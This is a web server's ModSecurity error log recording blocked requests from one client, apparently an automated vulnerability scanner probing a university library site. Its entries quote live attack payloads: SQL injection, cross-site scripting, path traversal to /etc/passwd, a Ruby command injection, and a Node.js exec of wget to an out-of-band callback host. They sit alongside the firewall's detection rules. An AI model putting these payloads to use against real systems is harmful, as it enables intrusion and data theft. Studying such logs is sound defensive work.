[Tue Aug 29 11:43:40.381504 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdeQ6IAAAAQ"]
[Tue Aug 29 11:43:40.471388 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfGaZwAAAAT"]
[Tue Aug 29 11:43:42.387337 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdb7rsAAAAb"]
[Tue Aug 29 11:43:43.373479 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAXNudwAAAAg"]
[Tue Aug 29 11:43:44.377502 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gMCo-f0AAAdxUYUAAAAC"]
[Tue Aug 29 11:43:47.402027 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAeX1IwAAAAK"]
[Tue Aug 29 11:43:48.348604 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAc4Er0AAAAP"]
[Tue Aug 29 11:43:48.427265 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdOeV4AAAAS"]
[Tue Aug 29 11:43:49.434991 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeChgUAAAAw"]
[Tue Aug 29 11:43:50.420529 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAdxUZ4AAAAC"]
[Tue Aug 29 11:43:50.440959 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdb7tcAAAAb"]
[Tue Aug 29 11:43:51.366408 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAenGcQAAAAM"]
[Tue Aug 29 11:43:54.887196 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13isCo-f0AAAfEBvMAAAAO"]
[Tue Aug 29 11:43:55.703721 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAffoq0AAAAd"]
[Tue Aug 29 11:43:56.375763 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfWNz4AAAAL"]
[Tue Aug 29 11:43:57.381532 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfbkrgAAAAZ"]
[Tue Aug 29 11:43:58.376972 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfFKBcAAAAR"]
[Tue Aug 29 11:43:59.356863 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfcoMwAAAAa"]
[Tue Aug 29 11:44:03.386206 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAftVCEAAAAf"]
[Tue Aug 29 11:44:03.704726 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAe8l7sAAAAF"]
[Tue Aug 29 11:44:07.442610 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAcsLQgAAAAE"]
[Tue Aug 29 11:44:08.435028 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAffosAAAAAd"]
[Tue Aug 29 11:44:08.451009 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfSWZ0AAAAB"]
[Tue Aug 29 11:44:10.396726 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAeX1MkAAAAK"]
[Tue Aug 29 11:44:13.380680 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfEBw8AAAAO"]
[Tue Aug 29 11:44:14.437007 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdQ3psAAAAV"]
[Tue Aug 29 11:44:16.368054 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gowdz4mj1rytym.oast.site found within TX:1: cjmnbitjmimt14dgn26gowdz4mj1rytym.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfky-EAAAAi"]
[Tue Aug 29 11:44:18.417229 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAdOeZ8AAAAS"]
[Tue Aug 29 11:44:20.415840 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26ghpegu1tqi5j8z.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdftg8AAAAG"]
[Tue Aug 29 11:44:23.438616 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAcsLTcAAAAE"]
[Tue Aug 29 11:44:26.381287 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfSWbUAAAAB"]
